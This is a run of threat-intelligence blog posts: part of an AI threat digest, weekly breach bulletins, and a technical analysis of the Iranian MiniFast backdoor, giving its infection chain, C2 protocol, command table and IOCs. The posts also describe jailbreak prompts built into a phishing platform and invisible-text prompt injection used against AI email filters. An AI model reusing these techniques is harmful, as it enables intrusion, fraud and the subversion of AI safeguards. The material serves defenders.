The jailbreak is the product. Both Groq-hosted LLaMA stages operate under a jailbreak embedded at the platform level, not applied by the operator and not visible to the customer. Stage 1 frames the model as an “authorized red team security analyst” conducting “sanctioned penetration tests”; Stage 2 upgrades to “senior red team analyst.” Prompts direct the model to reference real email threads, mask payment changes behind “plausible business reasons”, imitate sender style, and generate emails “realistic enough to fool a trained employee.” This is security bypass at SaaS scale: write the jailbreak once, ship it as a feature, and it’s inherited in every customer session.

The original EvilTokens advertising posts reveal additional features, including a Calendar Invite module which sends fake meeting invitations that appear as legitimate Outlook and Gmail meeting requests, with built-in Sender Spoofing (Organizer Identity). In a BEC context, this is used to apply timing pressure on finance personnel: a fake “urgent review meeting” appears on the target’s calendar shortly before a wire-transfer request lends the request a sense of pre-authorized context. Combined with the AI-generated email and the SMTP Sender, this completes a full BEC social engineering toolkit covered end-to-end by a single PhaaS offering.

Figure 4 - Figure 4: Calendar Invite module UI with Sender Spoofing section - From EvilTokens promotional forum postings.
Figure 4 – Calendar Invite module UI with Sender Spoofing section – From EvilTokens promotional forum postings.

EvilTokens’ Telegram channel announced additional AI-based features after Sekoia’s disclosure. The platform did not go offline and accelerated its AI feature development through April 2026.

Figure 5 – Announcement of additional AI related features – From EvilTokens Telegram channel.

The Vulnerability Race: AI on Both Sides of the Patch Window

AI-assisted vulnerability research has become a category in its own right and is now commercialized at both major frontier labs simultaneously on two tiers: a restricted research-grade capability and a productized defender tool.

At the frontier, Anthropic’s Claude Mythos, released through Project Glasswing, reportedly demonstrated a systematic, rapid mechanism to search for vulnerabilities and revealed a very large number of vulnerabilities, some long-buried zero-days in core infrastructure. These include a 27-year-old OpenBSD TCP/SACK bug found at roughly $20,000 in compute, a 16-year-old FFmpeg H.264 codec flaw, and a FreeBSD NFS remote code execution vulnerability in software that was analyzed for decades. The capability jump within a single generation is steep: on the same Firefox test set, Opus 4.6 produced 2 successful exploits and Mythos produced 181. Anthropic notes that this capability was not explicitly trained for but “emerged as a downstream consequence of general improvements in code, reasoning, and autonomy.” The productized tier is wider and more accessible: Claude Security (running on the public Opus 4.7 model) entered public beta for Enterprise customers, and OpenAI’s Codex Security, in research preview since early March, has had 14 CVEs assigned during the preview window on OpenSSH, GnuTLS, libssh, PHP, and Chromium.

The same capability curve is reaching attackers at the commodity tier, faster than defenders can patch. A researcher using a standard Claude API subscription identified CVE-2026-34197, a 13-year-old Apache ActiveMQ remote code execution vulnerability, and attributed roughly 80% of the work to Claude and the remainder to his refinement. LMDeploy SSRF (CVE-2026-33626) was exploited within 12 hours of the advisory publication, with no public proof-of-concept available. This time-frame compression is consistent with attackers building working exploits directly from advisory text. GenAI is accelerating this workflow.

Vendors are using AI to find vulnerabilities that sat undiscovered in core infrastructure for decades while attackers are using AI to find and weaponize newly-disclosed vulnerabilities within hours of publication. The patch window, the period between disclosure and exploitation, is being compressed on both sides. Vendors and customers need to adjust to a new high rate of patch development, delivery and deployment. The side that reacts the fastest will gain the most from recent AI developments.

Enterprise Adoption and Exposure

Corporate environment data collected by Check Point in March – April 2026 shows enterprise GenAI usage continuing to scale while the associated risk profile remains stable. Approximately one in every 28 prompts (3.6%) posed a high risk of sensitive data exposure, a modest increase from the January–February baseline of 3.2%, observed across 91% of organizations actively using GenAI tools (compared with 90% in the previous period). The proportion of prompts containing potentially sensitive information rose from 16% to 18%.

Figure 6 – GenAI related data from Corporate.

The average employee generated 78 prompts during March – April, up from 69, with organizations using an average of 10 GenAI tools. Interaction volume is rising while risk ratios remain stable, producing a proportional increase in absolute exposure events.

The consistency of these metrics across two reporting periods indicates a maturing adoption pattern: data exposure is not an episodic incident category but a continuous operational risk requiring sustained monitoring and policy enforcement.

Conclusion

Our findings converge on a small number of structural observations.

  • AI now operates as an attack component, not just as a development aid. The Mexican breach illustrates this at government-breach scale, and Bissa at mass-exploitation scale. The same commercial Claude Code architecture appears independently across criminal operations with different motivations and geographies, and in state-sponsored espionage. The convergence is operational consensus, not coincidence.
  • The techniques aren’t new but the performance envelope is. Network scanning, credential spraying, lateral movement, BEC drafting, and vulnerability research all predate AI. What’s changed is the speed (working exploits generated from advisory text alone within 12 hours of disclosure), scale (one operator reaching the operational footprint of an advanced team), and breadth of knowledge (cross-domain expertise on demand lowers the entry requirement for sophisticated multi-vector campaigns). Defences calibrated to human attack tempo and human team throughput are not equipped for the AI equivalents.
  • The AI attribution gap is structural. All the operations we documented in this report were discovered through attacker OPSEC failures or LLM provider monitoring, not through victim-side controls. AI-executed commands resemble skilled human activity closely enough to evade current behavioral controls. Operations that do not fail at OPSEC, or that route through stolen credentials or self-hosted models, remain unclassified.

The post AI Threat Landscape Digest March-April 2026 appeared first on Check Point Research.

25th May – Threat Intelligence Report

By: urias
25 May 2026 at 17:08

For the latest discoveries in cyber research for the week of 25th May, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • 7-Eleven, the global convenience store chain, confirmed a breach after an unauthorized access to systems used for franchisee documents. ShinyHunters claimed responsibility and said it stole more than 600,000 Salesforce records containing personal and corporate information, with affected individuals offered identity protection services.
  • Code hosting platform GitHub has suffered a breach after attackers weaponized a Visual Studio Code extension to compromise an employee device and steal internal source code. The company estimated about 3,800 internal repositories were exfiltrated, with no evidence of impact on customer-facing systems.
  • Grafana Labs, an open-source observability software company, disclosed a breach after a compromised GitHub token allowed intruders to access parts of its source code. The company reports that it has refused to pay ransom to the attackers and claims no customer data exposure or service disruption.
  • The FBI warns about Kali365, a phishing-as-a-service kit that is actively being used to target Americans and is distributed mainly through Telegram. The platform targets Microsoft 365 users with device-code phishing, captures OAuth access and refresh tokens, and enables persistent access to Outlook, Teams, and OneDrive while bypassing MFA.

AI THREATS

  • Check Point Research released the March-April 2026 AI Threat Landscape digest and demonstrated that AI-driven attacks have entered routine criminal use, citing a campaign where a single operator used commercial AI to compromise nine Mexican government agencies and execute over 5,000 automated commands. It also notes malicious configuration files that override safety controls, commercialized toolkits, and stolen API keys enabling abuse.
  • Researchers identified phishing campaigns that use indirect prompt injections to evade AI-powered email filters. Attackers embed invisible text inside messages, using zero-size fonts or background-matched colors, so recipients see ordinary content while AI scanning tools process attacker instructions during automated security review.
  • Researchers unveiled an AI-driven influence and fraud campaign run by a Russian-speaking actor behind a MAGA-themed Telegram channel with 17,000 subscribers. The operator bypassed Gemini safeguards to automate propaganda and credential theft, used stolen API keys, cracked WordPress accounts, and drained a crypto wallet.

VULNERABILITIES AND PATCHES

  • Microsoft published fixes for CVE-2026-41091 and CVE-2026-45498, two actively exploited Windows Defender flaws affecting the Malware Protection Engine and Defender Antimalware Platform. The first allows local privilege escalation, while the second can cause denial of service, with updated components released automatically through normal Defender updates.
  • Trend Micro addressed CVE-2026-34926, a directory traversal flaw in Apex One on-premises servers that allows attackers with administrator access push malicious code to endpoints. Exploitation attempts were observed against Windows systems, and the issue affects the enterprise endpoint security platform in corporate deployments
  • Drupal released emergency patches for CVE-2026-9082, a critical SQL injection flaw affecting Drupal sites using PostgreSQL. Successful exploitation can allow database command execution, potentially leading to data theft or code execution. Active attacks were reported shortly after disclosure across thousands of sites.

Check Point IPS provides protection against this threat (Drupal Core SQL Injection (CVE-2026-9082))

THREAT INTELLIGENCE REPORTS

  • Check Point Research has revealed new campaigns of Nimbus Manticore, an IRGC-linked group that resurfaced during Operation Epic Fury with upgraded techniques. The campaigns use SEO poisoning and career-themed phishing across the United States, Europe, and the Middle East, and then delivered a new MiniFast backdoor.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

  • Check Point researchers have highlighted a 124% surge in hacktivism and ransomware across Germany, Austria, and Switzerland in 2025. Germany accounted for most incidents, while hacktivists drove defacements and DDoS attacks, and ransomware activity was led by Akira, Qilin, and Safepay.
  • Researchers have uncovered Showboat, a Linux malware family used against international telecommunications providers. The modular post-exploitation framework can hide processes, transfer files, spawn remote shells, and operate as a SOCKS5 proxy. The activity is attributed to China-aligned threat actors.
  • Researchers uncovered a supply chain attack on Laravel Lang localization packages via Composer, where attackers rewrote GitHub tags to point to malicious commits. The campaign deployed a cross-platform credential stealer targeting cloud keys, developer tokens, and browser passwords across hundreds of package versions.
  • Researchers identified large-scale abuse of Middle Eastern telecom and hosting networks, with more than 1,350 active command-and-control servers across 98 providers. Linked activity included Phorpiex, Eagle Werewolf espionage, exploitation of a React Native CLI flaw, and RondoDox botnet activity at significant scale.

The post 25th May – Threat Intelligence Report appeared first on Check Point Research.

Fast and Furious – Nimbus Manticore Operations During the Iranian Conflict

22 May 2026 at 17:09

Key Findings

  • The Iranian, IRGC affiliated, threat actor Nimbus Manticore resurfaced during Operation Epic Fury, the US military campaign against Iran launched on February 28, 2026, demonstrating newly adopted techniques and enhanced capabilities.
  • The campaign leveraged malicious lures impersonating organizations in the aviation and software sectors across the United States, Europe and the Middle East.
  • For the first time, we observed the use of SEO poisoning as an additional malware delivery method.
  • The operation introduced a previously undocumented backdoor, named MiniFast, which appears to incorporate AI-assisted development practices, enabling the threat actor to rapidly develop and adapt tooling while maintaining high operational availability during the war.
  • The actor also used a Zoom installer’s execution flow and abused it to stage a time-sensitive infection chain for malware deployment while blending into legitimate system activity.

Introduction

During the recent geopolitical tensions in the Middle East, we reported on multiple Iran-nexus threat actors advancing Iran’s strategic objectives through cyber operations. These activities included targeting internet-connected cameras, conducting destructive attacks against US and Israeli entities, and exfiltrating data from cloud environments to support broader kinetic and intelligence-gathering efforts.

Nimbus Manticore (also tracked as UNC1549) is an IRGC-affiliated threat actor who primarily targets the defense, aviation and telecommunication sectors through career-themed phishing campaigns. Nimbus Manticore stands out compared to other Iranian-linked groups due to its complex malware toolset.

In 2025, we documented the MiniJunk malware framework used by Nimbus Manticore to target high-profile organizations across Western Europe and the Middle East.

In the recent campaign, the actor adopted several new techniques, including AppDomain (application domain) hijacking, AI-assisted malware development, and SEO poisoning.

In this article, we focus on three waves of the threat actor’s activity in the last few months, as well as discuss their latest techniques.

Figure 1 – 2026 campaign timeline during the ongoing military campaign.

Campaign 1: Rising Tension

In February 2026, amid rising tensions between the US, Israel and Iran and weeks of military buildup, we monitored new Nimbus Manticore phishing activity worldwide. In this campaign, the threat actor introduced a modified infection chain by abusing AppDomain Hijacking for execution instead of relying on the usual DLL sideloading techniques.

AppDomain Hijacking is a technique that abuses legitimate .NET applications to load a malicious DLL at launch time. This is achieved by placing a Trojanized XML .config file in the same directory as the target application. The configuration file, named after the abused binary with the .config suffix, specifies an attacker-controlled AppDomainManager class that points to a malicious DLL. When the application starts, the .NET runtime loads the DLL, enabling malicious code execution within the context of the trusted process.

Figure 2 – Config file pointing the appDomainManager class to the attacker-controlled DLL.

The phishing lure is consistent with previous Nimbus Manticore campaigns, targeting employees in selected organizations (primarily software and aviation sectors) with fake career opportunities. Targeted organizations in Saudi Arabia and Australia were directed to download a compressed ZIP archive stored on the OnlyOffice platform.

Figure 3 – ZIP file hosted on Onlyoffice.

The downloaded ZIP file contains these files:

  • Setup.exe – Benign Microsoft-signed binary.
  • Setup.exe.config – AppDomain Hijacking configuration file pointing to uevmonitor.dll.
  • uevmonitor.dll – A first stage Dropper.
  • Interop.TaskScheduler.dll – a benign DLL.

Figure 4 – Zip file masquerading as an Accenture job opportunity.

After the setup.exe binary is executed, the first-stage loader (uevmonitor.dll) is loaded. This component is responsible for extracting and deploying the next-stage payload, which is stored in encrypted form within the loader itself.

The extracted files are written into C:\Users\<USER>\AppData\Local\Packages\ and include a legitimate executable used for DLL sideloading alongside a malicious DLL identified as a new version of the MiniJunk backdoor.

The first-stage loader uevmonitor.dll shares multiple behaviors similar to older MiniJunk loader variants. These include validating that it is loaded specifically by the Setup.exe process and displaying a fake error message stating "Couldn't connect to survey server" to appear as a legitimate application failure and reduce user suspicion.

Campaign 2: During Operation Epic Fury

Figure 5 – Campaign 2: During Operation Epic Fury – Attack Chain.

During Operation Epic Fury, we continued to observe activity from the threat actor. Despite the challenging environment, Nimbus Manticore demonstrated a strong ability to rapidly adapt, maintain infrastructure, and develop new tooling. We assess that this capability was likely supported, at least in part, by LLM-based tools and AI-assisted development techniques.

In addition to career-themed phishing lures masquerading as a US-based airline, the threat actor also used a Trojanized Zoom installer, which we assess was part of a phishing campaign using fake meeting invitations. In addition, the Trojanized Zoom installer demonstrated in-depth research into the original application’s installation and execution flow, enabling it to be seamlessly integrated into the infection chain.

Similar to previous campaigns, the threat actor continued leveraging AppDomain Hijacking, not just for the initial execution stage but also during the deployment and execution of the final backdoor. For the final payload, the threat actor introduced a new backdoor that we named MiniFast, replacing the previously used MiniJunk malware family.

Many of the files used throughout the campaign had valid digital signatures via SSL.com, continuing the abuse of trusted signing infrastructure we previously documented in our 2025 report. We identified the use of at least two certificates during the current activity, including:

  • Gray Matter Software S.R.L.
  • Kirubel Kerie Negeya

Infection Chain

The infection chain begins with the victim downloading a compressed archive named Zoominstall64.zip, which contains the following files:

  • Setup.exe – Benign Microsoft-signed binary (ServiceHub.VSDetouredHost.exe).
  • Setup.exe.config – AppDomain Hijacking configuration file pointing to InitInstall.dll.
  • InitInstall.dll – First-stage loader.
  • Zoom_cm.exe – Original Zoom installer.
  • UpdateConfig.xml – AppDomain Hijacking configuration file pointing to Updater.dll.
  • Updater.dll – Second-stage loader.
  • UpdateChecker.dll – Final backdoor payload (MiniFast).

First-Stage Deployment

After Setup.exe is launched by the user, the first-stage loader (InitInstall.dll) is executed through AppDomain Hijacking using the accompanying .config file.

The loader itself is lightly obfuscated. Most readable strings are decrypted at runtime using a simple combination of ROT13 encoding and reversed-string transformations. Aside from the string obfuscation layer, the codebase contains meaningful function names and relatively well-structured logic. Execution begins with the malware displaying a fake installation progress window intended to mimic legitimate software installation activity. At the same time, the loader launches the legitimate Zoom installer (Zoom_cm.exe) to make the execution flow appear to the victim as a normal software installation.

Persistence through Task hijacking

After launching the installer, the malware enters a loop that lasts approximately one minute, continuously monitoring the system for the creation of a scheduled task matching this format:

ZoomUpdateTaskUser-<current user SID>

This scheduled task is usually created by the legitimate Zoom installer during installation.

When the task is created, the malware hijacks and modifies it to execute the second-stage component instead. By abusing an existing Zoom scheduled task rather than creating a new suspicious persistence mechanism, the malware attempts to blend into legitimate system activity and reduce detection opportunities.

Second-Stage Deployment

The next-stage files are copied into C:\Users\<USER>\AppData\Local\Zoom\bin\update. This directory contains four files copied from the original archive, including the benign Microsoft-signed binary from the first stage, now renamed to Update.exe. The malware again abuses AppDomain Hijacking to load the second-stage loader (Updater.dll) through the trusted Update.exe process.

Similar to the first stage, the second-stage loader uses the same runtime string decryption routine based on ROT13 and reversed strings.

At the beginning of its execution, the loader performs a simple anti-analysis validation intended to evade sandbox environments and automated dynamic analysis systems. The malware only continues execution if:

  • The hosting process name is update.exe
  • The parent process is svchost.exe

This execution-chain validation ensures that the DLL is loaded by the malware’s intended loader component and that execution originates from the scheduled-task persistence mechanism instead of launched directly through explorer.exe etc.

The primary purpose of the second-stage loader is to dynamically load the final MiniFast payload (UpdateChecker.dll), locate its exported function named CheckForUpdates, and execute it.

Adoption of AI

This campaign also provides multiple indications that the threat actor leveraged AI-assisted development during the malware creation. We see evidence for this in both the initial access loaders and within the MiniFast backdoor itself.

Several coding patterns and implementation details strongly suggest the use of AI-generated or AI-assisted code during development, including:

  • Excessive error handling and defensive programming logic, even around simple API calls such as GetUserName.
  • Repetitive function and method naming patterns containing descriptive or verbose identifiers.
  • Multiple detailed error-reporting strings and debug-style status messages embedded throughout the codebase.
  • Modular code organization despite the malware’s overall simplicity.

These characteristics are increasingly prevalent in malware development as threat actors leverage AI-assisted tools to accelerate development, improve code structure, and rapidly utilize new capabilities.

Campaign 3: Post Ceasfire – “SQL developer” Campaign

In April, we observed a new infection method, a fake website impersonating a download page for SQL Developer, a graphical tool used for working with databases. Users who attempted to download the software from the fake site instead received a weaponized installer that delivered the MiniFast backdoor.

Figure 6 – Screenshot of the getsqldeveloper[.]com site.

This malware delivery method differs from Nimbus Manticore’s usual infection chains which typically rely on career-themed phishing lures. In this campaign, the actor abuses search engine optimization techniques by registering dozens of domains that link to the bogus domain, getsqldeveloper[.]com. This is likely an attempt to increase the site’s visibility through link-based reputation signals.

At the time of our analysis, the malicious domain ranked high in the results returned by multiple search engines, such as Bing and DuckDuckGo, for the query “sql developer.” This increased the likelihood that users searching for legitimate SQL Developer downloads would encounter the site.

The pages also rely on keyword stuffing, repeatedly using search-oriented phrases such as “Download SQL Developer” and “SQL Developer Free,” likely to improve ranking for users searching for SQL Developer-related downloads.

MiniFast Technical Analysis

MiniFast is a 64-bit Windows PE DLL that exposes a single export named CheckForUpdates which acts as the main entry point. The DLL operates as a fully featured backdoor designed for long-term persistence and remote command execution. Analysis of multiple samples indicates the malware is undergoing active development, with the threat actor continuously modifying and improving the implant across versions.

Figure 7 – Export function CheckForUpdates structure.

Similar to the previous stage, the backdoor again appears to be executing under the expected process chain by verifying that the hosting process is named update.exe and that its parent process is svchost.exe

The implant communicates with its C2 (command and control) infrastructure using an API-style architecture with JSON-formatted data exchanges. To blend into legitimate network traffic, the malware impersonates a Chrome browser using the following hardcoded User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36

The backdoor implements several structured HTTP endpoints throughout the infection lifecycle:

URIMethodPurpose
/rgPOSTInitial handshake
/agent/initPOSTInitial victim registration
/agent/poll?token=GETTask retrieval
/agent/resultPOSTCommand execution result upload
/upload/PUTFile exfiltration
/files/GETFile download from the C2

Before entering its tasking loop, the malware performs basic host reconnaissance by collecting information such as the username, hostname, and domain info, and then submits the collected data as a unique clientId to the /rg endpoint using a POST request.

{
  "clientId":"<ComputerName>:<USERDOMAIN>\<UserName>",
  "type":"poll"
}

If the server responds with HTTP status code 200, the backdoor skips parsing the response body and continues executing normally. However, when the server responds with status code 400, the malware parses the returned JSON object and extracts a socketId, which acts as the session identifier for all future communications.

In addition, the server response may include updated values for pollInterval and jitterTime, allowing the operator to dynamically adjust the timing between subsequent communications with the C2 infrastructure.

{
  "socketId":"<string>",
  "pollInterval":120000,
  "jitterTime":5000
}

Next, the backdoor continues to register the infected host by again sending the machine information, this time to the /agent/init in the following format:

{
  "token": "<socketId>",
  "pcName": "<computer_name>",
  "userName": "<user_name>",
  "domainName": "<USERDOMAIN>",
  "isElevated": true_or_false
}

Only after it receives an HTTP status code 200 from the C2 server does the backdoor proceed to fetch commands for execution using a GET request to /agent/poll?token=<socketId>.

Here, the communication between the implant and the C2 server is not in a JSON format and is performed using Base64-encoded serialized task structures, where each response contains one or more encoded tasks that are later decoded and processed by the backdoor.

struct PollEnvelope {
    uint32_t task_count;
    struct TaskDescriptor {
        uint32_t len_base64;
        char     base64_task[len_base64]; // ASCII, no null terminator
    } tasks[task_count];
};

Each task is then Base64-decoded into a secondary structure, containing the opcode and associated arguments:

struct TaskRecord {
    uint8_t  opcode;
    uint8_t  pad[7];                // alignment
    custom_str_struct arg_main;     // at offset +0x08: main command argument
    custom_str_struct arg_aux;      // at offset +0x28: secondary arg (if needed)
    custom_str_struct taskId;       // at offset +0x48: unique task identifier
}

The opcode determines which capability is executed, while the remaining fields contain command arguments and task tracking identifiers. The malware implements a structured opcode-based command handler that provides operators with extensive control over infected systems.

Figure 8 – MiniFast Command switch.

The supported command set:

OpcodeCapabilityArgumentsDescription
0x02List DirectorypathLists files and folders inside a specified directory.
0x03Move / RenamesourcedestinationMoves or renames files and directories on the victim machine.
0x04Execute CommandcommandExecutes shell commands using cmd.exe /c and returns captured output.
0x05Enumerate ProcessesNoneEnumerates running processes and returns process names alongside their PIDs.
0x06Delete File / DirectorypathDeletes files or directories depending on the target type.
0x07Download FilefileUuiddestinationPathDownloads a file from the C2 server to the local machine.
0x08Upload FilepathUploads local files from the infected machine to the C2 server.
0x09Enumerate DrivesNoneLists available logical drives on the infected machine.
0x0AKill ProcesspidTerminates a process using its PID.
0x0BLoad DLLdllPathexportNameDynamically loads a DLL and invokes a specified exported function.
0x0CCreate DirectorypathCreates a new directory on the victim machine.
0x0DCreate ZIP ArchivesourcePathzipPathCreates a ZIP archive from files or directories.
0xB0Request UAC ElevationpathOrCommandAttempts to relaunch a process with elevated privileges using runas.
0xB1Install PersistencebinaryPathCreates or updates a scheduled task named WindowsSecurityUpdate.
0xF0Set Poll IntervalmillisecondsUpdates the beacon polling interval.
0xF1Idle Command AcknowledgeNoneAcknowledges an idle-time command without modifying behavior.
0xF2Set JittermillisecondsUpdates the jitter value applied to beacon intervals.
DefaultUnknown OpcodeAnyReturns an error for unsupported commands.

After executing a task, the implant serializes the execution result into a dedicated response structure which is Base64-encoded and submitted back to the C2 server through the /agent/result endpoint. The encoded result object contains the task identifier, execution status, and command output:

struct ResultEntry {
    uint32_t taskIdLen;           
    char     taskId[taskIdLen];   // unique task identifier
    uint32_t status;              // 0 = success, 1 = error
    uint8_t  resultText[resultLen]; // command output
};

Victimology

Nimbus Manticore consistently focuses on Europe, the Middle East and Africa, particularly Israel and the United Arab Emirates. However, in contrast to our previous research, the actor’s recent operations demonstrate an expansion toward aviation-sector targets in the United States.

As observed in prior campaigns, there appears to be a strong correlation between the phishing lure and the targeted sector. For example, fraudulent hiring portals impersonating aviation companies were used to target employees and organizations operating within that industry. In the current campaign, impersonate US domestic airlines suggest a deliberate focus on US-based targets.

Our findings indicate targeting extends across several strategic sectors, including aviation and software development. These sectors align with the IRGC’s broader intelligence collection priorities.

Figure 9 – Geographic Distribution of victims around the world.

Conclusion

Nimbus Manticore is one of the most sophisticated Iranian-aligned threat actors with a long-standing focus on the defense, telecommunications, and aviation sectors. The ongoing conflict in the Middle East, combined with the operational demands of wartime activity, appears to have significantly accelerated their malware evolution.

As an IRGC-affiliated entity operating under heightened geopolitical conditions, Nimbus Manticore demonstrated a rapid adoption cycle for new techniques, tooling, and operational methodologies. The actor’s activity during Operation Epic Fury highlights their increasing adaptability, particularly through the integration of AI-assisted malware development, novel infection vectors, and advanced stealth mechanisms.

IOCs

SHA256
10fd541674adadfbba99b54280f7e59732746faf2b10ce68521866f737f1e46d
eee657ffdb2af8ed6412221e7d5fbf4f5742f2ac2c88f43f12db46af0697de71
781605ce9d4a9869e846f6c9657d71437cb6240ab27ffbc4cd550c0e06996690
2c214494fd0bad31473ca8adce78a4f50847876584571e66aadeae70827ec2dc
f08b17856616d66492a24dced27f788e235f35f42fa7cd10f315000d3a2f4c03
a57ffb819fe8d98ff925c5d7b239598fe302acf5a13193d7a535040a71298fdf
63d0d3c4a7f71bdbca720903d6a99b832089cc093c64d2938e7e001e56c17ab4
74882085db2088356ed7f72f01e0404a0a98cda88ef56fb15ce74c1f36b26d27
bc3b44154518c5794ce639108e7b9c5fecb0c189607a26de1aaed518d890c7ad
ecaf493c320d201d285ef5f61d75744216e47cf1115b4af528f9a78883cc446e
44f4f7aca7f1d9bfdaf7b3736934cbe19f851a707662f8f0b0c49b383e054250
0db36a04d304ad96f9e6f97b531934594cd95a5cea9ff2c9af249201089dc864
485f182f7b74ea4013b2539275a95d21e3a9bf0082c331937af9353a324b36f3
64530d7e6ee30e4a66d9eeed6b8595c33fd72f5f73409133ca40539e5695df4c
332ba2f0297dfb1599adecc3e9067893e7cf243aa23aedce4906a4c480574c17
9e4a658e6d831c9e9bdfe11884a75b7c64812ed0a80e8495ddf6b316505acac1
43dc62cef52ebdd69e79f10015b3e13890f26c058325c0ff139c70f8d8eadcfa
8808c794c24367438f183e4be941876f1d3ecd0c8d2eb43b10d2380841d2283b
5c3362d20229597d11380f56d1f2eb39647fb6afad7be8392a7abcd18dff12f8
0291ef318576953f7f3fe287e7775ed1d7c3206119dc7b9cd6d85c02779e6e40
d4a7e9f107fe40c1a5d0139c6c6e25bf6bf57f61feff090bee28f476bb3cc3c2
38bd137c672bd58d08c4f0502f993a6561e2c3411773d1ae57ee0151a0a9d11d
f54cd38632ac9da3af3533ae93e92625cbcb04df521dbf1b6acfaa81218f9e8c
b19e06da580cf91691eda066ac9ee4b09c6e5dc26c367af12660fe1f9306eec4
9cf029daca89523d917dafed0568d11d00e45ec96b5b90b4a1f7fd4018c7da84
a13ba3c5aff46e9daf2d23df4b3e3d49dc7236c207c56f0a1433051f3450d441
dfa1e3137a032ee8561a1cd5e1a0f71a10bebb36aef7c336c878638a9c1239ee

Domains
business-startup[.]org
business-startup.azurewebsites[.]net
businessstartup.azurewebsites[.]net
buisness-centeral.azurewebsites[.]net
buisness-centeral-transportation.azurewebsites[.]net
buisness-centeral-transportation[.]com
licencemanagers.azurewebsites[.]net
licencesupporting.azurewebsites[.]net	
peerdistsvcmanagers.azurewebsites[.]net
nanomatrix.azurewebsites[.]net
PremierHealthAdvisory[.]com
PremierHealthAdvisory[.]azurewebsites.net
Premier-HealthAdvisory[.]azurewebsites.net
ramiltonsfinance[.]com
ramiltonsfinance.azurewebsites[.]net
ramiltons-finance.azurewebsites[.]net
globalitconsultants.azurewebsites[.]net
globalit-consultants.azurewebsites[.]net
global-it-consultants.azurewebsites[.]net
global-it-checkers.azurewebsites[.]net
global-it-checkbusiness.azurewebsites[.]net
global-check-itbusiness.azurewebsites[.]net
global-check-business-it.azurewebsites[.]net
globalbusiness-checkers-it.azurewebsites[.]net
getsqldeveloper[.]com

The post Fast and Furious – Nimbus Manticore Operations During the Iranian Conflict appeared first on Check Point Research.

Received — 19 May 2026 Check Point Research

18th May – Threat Intelligence Report

By: urias
18 May 2026 at 16:58

For the latest discoveries in cyber research for the week of 18th May, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Vodafone, a major international telecom, has sustained a source code leak claimed by the Lapsus$ extortion group. The company confirmed limited access to GitHub files through compromised third-party development software, while stating that customer data and core network infrastructure were not affected by the incident.
  • Cryptocurrency platform THORChain, based in Switzerland, has encountered a security breach that led to the theft of about $10.7M. Trading was halted after one of six vaults was compromised, and the company said losses were limited to protocol-owned assets across several blockchains.
  • West Pharmaceutical Services, a global manufacturer of drug delivery components, has experienced a ransomware attack that disrupted shipping, manufacturing, and shared service functions. The company disclosed that some systems were encrypted and data was stolen, but no ransomware group has publicly claimed responsibility.
  • Foxconn, a global electronics manufacturer, has confirmed it was hit by a cyberattack on its North American operations after the Nitrogen ransomware group claimed to have stolen 8TB of data. The company confirmed disruption at some factories and said affected facilities were resuming normal production.

AI THREATS

  • Researchers unveiled ‘Claw Chain’, four vulnerabilities in OpenClaw, an autonomous AI agent platform, that allow attackers to bypass sandbox controls, expose restricted files, leak secrets, and gain owner-level access. The flaws include the critical CVE-2026-44112, rated CVSS 9.6.
  • Researchers developed an AI-assisted macOS kernel exploit that bypasses Apple’s Memory Integrity Enforcement on M5 chips and grants full system control on macOS 26.4.1. Anthropic’s Mythos Preview reportedly accelerated bug discovery, and the findings were privately reported to Apple before public disclosure.
  • Researchers detailed how threat actors abuse Vercel’s AI website generator, v0.dev, to mass-produce realistic phishing pages mimicking brands such as Microsoft and Spotify. The campaigns utilize Telegram bots to capture credentials and payment details in real time.
  • Researchers found a popular Hugging Face repository hiding Windows-targeting malware after it amassed over 200,000 downloads. The package posed as OpenAI’s privacy filter and installed an infostealer that harvested browser passwords, cookies, SSH keys, VPN configurations, and cryptocurrency wallets before exfiltrating the data.

VULNERABILITIES AND PATCHES

  • Two Windows zero-day vulnerabilities, YellowKey and GreenPlasma, affect Windows 11 and recent Windows Server versions. YellowKey allows BitLocker bypass through Windows Recovery Environment with physical access, while GreenPlasma abuses the CTFMON framework to escalate privileges to SYSTEM. Proof-of-concept code is public, and the vulnerabilities are still unpatched.
  • F5 has fixed CVE-2026-42945, a critical memory flaw in the NGINX rewrite module affecting versions 0.6.27 through 1.30.0. The 18-year-old bug enables denial of service and, under specific configurations, possible remote code execution. Public exploit code requires memory protections to be disabled.

Check Point IPS provides protection against this threat (Nginx Heap Overflow (CVE-2026-42945))

  • Cisco has addressed CVE-2026-20182, a critical authentication bypass in Catalyst SD-WAN controllers that is being actively exploited. The flaw allows remote, unauthenticated attackers to gain full administrative control of affected systems. CISA ordered federal agencies to patch vulnerable devices following Cisco’s fixes.
  • Apple has released security updates for CVE-2026-28819, an out-of-bounds write flaw in the Wi-Fi component affecting iOS, iPadOS, and macOS. Successful exploitation could allow an app to execute code with kernel privileges. The issue was addressed with improved bounds checking.

THREAT INTELLIGENCE REPORTS

  • Check Point Research has analyzed an internal leak from The Gentlemen ransomware operation, exposing chats, infrastructure details, affiliate roles, and ransom negotiations. The report links the zeta88 account to the administrator, maps 8 affiliate TOX IDs, and details the use of Fortinet and Cisco vulnerabilities as well as NTLM relay and OWA/M365 for initial access in attacks.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

  • Check Point Research has summarized Q1 2026 ransomware trends, recording 2,122 leak-site victims, which is the second-highest Q1 on record, and renewed consolidation. The top 10 groups were responsible for 71% of victims. Qilin led with 338 victims, The Gentlemen rose to third, and LockBit 5.0 returned with 163 victims.
  • Check Point Research have quantified a World Cup 2026-driven surge in cyber activity, with weekly attacks per organization rising in Mexico, Canada, and the United States in April, across the media, hospitality, transportation and travel sectors. FIFA-themed domains reached 9,741 in April, and by early May, one in 41 were malicious.
  • Researchers attributed a months-long intrusion against an Azerbaijani oil and gas company to the Chinese-linked FamousSparrow group. Attackers exploited an unpatched Microsoft Exchange server to deploy web shells, then alternated between Deed RAT and TernDoor across three waves of persistent activity.

The post 18th May – Threat Intelligence Report appeared first on Check Point Research.

Thus Spoke…The Gentlemen

13 May 2026 at 15:01

Key Points

  • On May 4th, 2026, The Gentlemen RaaS administrator acknowledged on underground forums that an internal backend database (Rocket) had been leaked. This leak exposed 9 accounts, including zeta88 (aka hastalamuerte), who runs the infrastructure, builds the locker and RaaS panel, manages payouts, and effectively acts as the administrator of the program.
